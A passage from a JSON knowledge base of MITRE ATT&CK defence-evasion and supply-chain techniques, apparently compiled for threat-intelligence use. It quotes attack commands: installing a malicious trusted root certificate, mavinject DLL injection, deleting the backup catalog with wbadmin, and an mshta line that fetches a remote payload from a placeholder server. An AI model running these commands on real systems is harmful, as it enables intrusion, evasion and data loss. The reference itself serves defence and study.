"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e558aca4-3db1-42a0-bec2-bb9823852b49",
"value": "Gatekeeper Bypass"
},
{
"description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.<sup>[[Wikipedia Root Certificate](https://app.tidalcyber.com/references/68b9ccbb-906e-4f06-b5bd-3969723c3616)]</sup> Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.<sup>[[Operation Emmental](https://app.tidalcyber.com/references/36443369-4fa9-4802-8b21-68cc382b949f)]</sup>\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) capability for intercepting information transmitted over secure TLS/SSL communications.<sup>[[Kaspersky Superfish](https://app.tidalcyber.com/references/3d554c05-992c-41f3-99f4-6b0baac56b3a)]</sup>\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.<sup>[[SpectorOps Code Signing Dec 2017](https://app.tidalcyber.com/references/3efc5ae9-c63a-4a07-bbbd-d7324acdbaf5)]</sup>\n\nIn macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.<sup>[[objective-see ay mami 2018](https://app.tidalcyber.com/references/1b1d656c-4fe6-47d1-9ce5-a70c33003507)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1553.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "3a956db0-a3f0-442a-a981-db2ee20d60b2",
"value": "Install Root Certificate"
},
{
"description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.<sup>[[Microsoft Zone.Identifier 2020](https://app.tidalcyber.com/references/2efbb7be-3ca1-444a-8584-7ceb08101e74)]</sup> Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.<sup>[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)]</sup><sup>[[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)]</sup><sup>[[Intezer Russian APT Dec 2020](https://app.tidalcyber.com/references/88d8a3b7-d994-4fd2-9aa1-83b79bccda7e)]</sup>\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.<sup>[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)]</sup><sup>[[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1553.005"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "7ee64e42-6d3b-47f8-a2a9-55263537bd51",
"value": "Mark-of-the-Web Bypass"
},
{
"description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode <sup>[[Microsoft Authenticode](https://app.tidalcyber.com/references/33efd1a3-ffe9-42b3-ae12-970ed11454bf)]</sup> digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, <sup>[[Microsoft WinVerifyTrust](https://app.tidalcyber.com/references/cc14faff-c164-4135-ae36-ba68e1a50024)]</sup> which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) <sup>[[EduardosBlog SIPs July 2008](https://app.tidalcyber.com/references/ac37f167-3ae9-437b-9215-c30c1ab4e249)]</sup> to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all <sup>[[Microsoft Catalog Files and Signatures April 2017](https://app.tidalcyber.com/references/5b6ae460-a1cf-4afe-a0c8-d6ea24741ebe)]</sup>) and are identified by globally unique identifiers (GUIDs). <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>\n\nSimilar to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>\n\n* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIPs CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the files real signature, an adversary can apply an acceptable signature value to all files using that SIP <sup>[[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)]</sup> (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID}</code> that point to the DLL providing a SIPs CryptSIPDllVerifyIndirectData function, which validates a files computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP <sup>[[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)]</sup> (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID}</code> that point to the DLL providing a trust providers FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIPs CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1553.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "62e5e1c5-4fee-4f05-9dd4-a6dc306a46b1",
"value": "SIP and Trust Provider Hijacking"
},
{
"description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b) in support of subverting these controls.<sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup> Adversaries may also create or steal code signing certificates to acquire trust on target systems.<sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup><sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup> ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "9449c0d5-7445-45e0-9861-7aafd6531733",
"type": "similar"
},
{
"dest-uuid": "c26e1b28-89c9-4083-9f94-022c891bf60c",
"type": "similar"
},
{
"dest-uuid": "e558aca4-3db1-42a0-bec2-bb9823852b49",
"type": "similar"
},
{
"dest-uuid": "3a956db0-a3f0-442a-a981-db2ee20d60b2",
"type": "similar"
},
{
"dest-uuid": "7ee64e42-6d3b-47f8-a2a9-55263537bd51",
"type": "similar"
},
{
"dest-uuid": "62e5e1c5-4fee-4f05-9dd4-a6dc306a46b1",
"type": "similar"
}
],
"uuid": "73a8b954-93fe-466c-b73d-bd35bb08c3e7",
"value": "Subvert Trust Controls"
},
{
"description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1195.003"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "53fea37d-be26-4bed-a8a1-1d67f7cbffcf",
"value": "Compromise Hardware Supply Chain"
},
{
"description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup> \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1195.001"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "590b55cd-7c6a-4207-b89a-3d7494623f00",
"value": "Compromise Software Dependencies and Development Tools"
},
{
"description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1195.002"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "9953faea-d25d-4e6e-a132-8993535c5c14",
"value": "Compromise Software Supply Chain"
},
{
"description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)<sup>[[IBM Storwize](https://app.tidalcyber.com/references/321cf27a-327d-4824-84d0-56634d3b86f5)]</sup><sup>[[Schneider Electric USB Malware](https://app.tidalcyber.com/references/e4d8ce63-8626-4c8f-a437-b6a120ff61c7)]</sup> \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
},
{
"dest-uuid": "53fea37d-be26-4bed-a8a1-1d67f7cbffcf",
"type": "similar"
},
{
"dest-uuid": "590b55cd-7c6a-4207-b89a-3d7494623f00",
"type": "similar"
},
{
"dest-uuid": "9953faea-d25d-4e6e-a132-8993535c5c14",
"type": "similar"
}
],
"uuid": "b72c8a96-5e03-40c2-ac0c-f77b73fe493f",
"value": "Supply Chain Compromise"
},
{
"description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. <sup>[[Microsoft Connection Manager Oct 2009](https://app.tidalcyber.com/references/0b0880a8-82cc-4e23-afd9-95d099c753a4)]</sup> CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. <sup>[[Twitter CMSTP Usage Jan 2018](https://app.tidalcyber.com/references/836621f3-83e1-4c55-8e3b-740fc9ba1e46)]</sup> Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs <sup>[[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)]</sup> and/or COM scriptlets (SCT) from remote servers. <sup>[[Twitter CMSTP Jan 2018](https://app.tidalcyber.com/references/3847149c-1463-4d94-be19-0a8cf1db0b58)]</sup> <sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup> <sup>[[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)]</sup> This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. <sup>[[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)]</sup> <sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup> <sup>[[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "581c5073-4236-4c45-b8fc-37ae2dfbb65f",
"value": "CMSTP"
},
{
"description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. <sup>[[Microsoft HTML Help May 2018](https://app.tidalcyber.com/references/f9daf15d-61ea-4cfa-a4e8-9d33d1acd28f)]</sup> CHM content is displayed using underlying components of the Internet Explorer browser <sup>[[Microsoft HTML Help ActiveX](https://app.tidalcyber.com/references/ae5728bd-571a-451f-9ba3-3198067135b4)]</sup> loaded by the HTML Help executable program (hh.exe). <sup>[[Microsoft HTML Help Executable Program](https://app.tidalcyber.com/references/1af226cc-bb93-43c8-972e-367482c5d487)]</sup>\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. <sup>[[MsitPros CHM Aug 2017](https://app.tidalcyber.com/references/d4e4cc8a-3246-463f-ba06-d68459d907d4)]</sup> <sup>[[Microsoft CVE-2017-8625 Aug 2017](https://app.tidalcyber.com/references/402cb526-ef57-4d27-b96b-f98008abe716)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "b5c7edc6-0cc7-4c57-b39f-3b0474433889",
"value": "Compiled HTML File"
},
{
"description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup><sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup> For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup> Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup> <sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup><sup>[[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)]</sup>\n\nMalicious Control Panel items can be delivered via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns<sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup><sup>[[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)]</sup> or executed as part of multi-stage malware.<sup>[[Palo Alto Reaver Nov 2017](https://app.tidalcyber.com/references/69fbe527-2ec4-457b-81b1-2eda65eb8442)]</sup> Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "b5cc9ab3-6501-4c50-904e-1a25a4088125",
"value": "Control Panel"
},
{
"description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. <sup>[[MSDN InstallUtil](https://app.tidalcyber.com/references/54d962fc-4ca6-4f5f-b383-ec87d711a764)]</sup> The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and <code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. <sup>[[LOLBAS Installutil](https://app.tidalcyber.com/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9ca43902-5632-43e9-9dc1-84a8eafe44bd",
"value": "InstallUtil"
},
{
"description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).<sup>[[LOLBAS Mavinject](https://app.tidalcyber.com/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]</sup>\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5)), allowing for arbitrary code execution (ex. <code>C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).<sup>[[ATT Lazarus TTP Evolution](https://app.tidalcyber.com/references/594c59ff-c4cb-4164-a62d-120e282b2538)]</sup><sup>[[Reaqta Mavinject](https://app.tidalcyber.com/references/5c0e0c84-2992-4098-8913-66a20ca61bf4)]</sup> Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5), Mavinject.exe can also be abused to perform import descriptor injection via its <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.<sup>[[Mavinject Functionality Deconstructed](https://app.tidalcyber.com/references/17b055ba-5e59-4508-ba77-2519c03c6d65)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.013"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "766dd13c-6ee1-41da-81cd-a22a27d68103",
"value": "Mavinject"
},
{
"description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.<sup>[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)]</sup><sup>[[what_is_mmc](https://app.tidalcyber.com/references/57e130ab-f981-423e-bafe-51d0d0e1abdf)]</sup> MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.<sup>[[win_msc_files_overview](https://app.tidalcyber.com/references/81aa896a-3498-4c37-8882-2b77933b71a8)]</sup>\n\nFor example, <code>mmc C:\\Users\\foo\\admintools.msc /a</code> will open a custom, saved console msc file in author mode.<sup>[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)]</sup> Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).<sup>[[win_wbadmin_delete_catalog](https://app.tidalcyber.com/references/6adfba35-3bf1-4915-813e-40c4a843ae34)]</sup><sup>[[phobos_virustotal](https://app.tidalcyber.com/references/929dbb22-34a5-4377-95dd-9e240ecb343a)]</sup>\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) class object.<sup>[[win_clsid_key](https://app.tidalcyber.com/references/239bb629-2733-4da3-87c2-47a7ab55433f)]</sup> Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.<sup>[[mmc_vulns](https://app.tidalcyber.com/references/7bcf1c90-6299-448b-92c3-a6702882936a)]</sup> Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.<sup>[[abusing_com_reg](https://app.tidalcyber.com/references/7f0f223f-09b1-4f8f-b6f1-1044e2ac7066)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1218.014"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "43c2f853-cb52-4242-94e9-ec53743f3c05",
"value": "MMC"
},
{
"description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code <sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup> <sup>[[Red Canary HTA Abuse Part Deux](https://app.tidalcyber.com/references/39b1cb2f-a07b-49f2-bf2c-15f0c9b95772)]</sup> <sup>[[FireEye Attacks Leveraging HTA](https://app.tidalcyber.com/references/1876a476-b2ff-4605-a78b-89443d21b063)]</sup> <sup>[[Airbus Security Kovter Analysis](https://app.tidalcyber.com/references/a8420828-9e00-45a1-90d7-a37f898204f9)]</sup> <sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup> \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. <sup>[[Wikipedia HTML Application](https://app.tidalcyber.com/references/f1f76055-91f8-4977-9392-bed347e4f181)]</sup> HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. <sup>[[MSDN HTML Applications](https://app.tidalcyber.com/references/2de103a8-8d72-40f9-b366-b908364dd090)]</sup>\n\nFiles may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))</code>\n\nThey may also be executed directly from URLs: <code>mshta 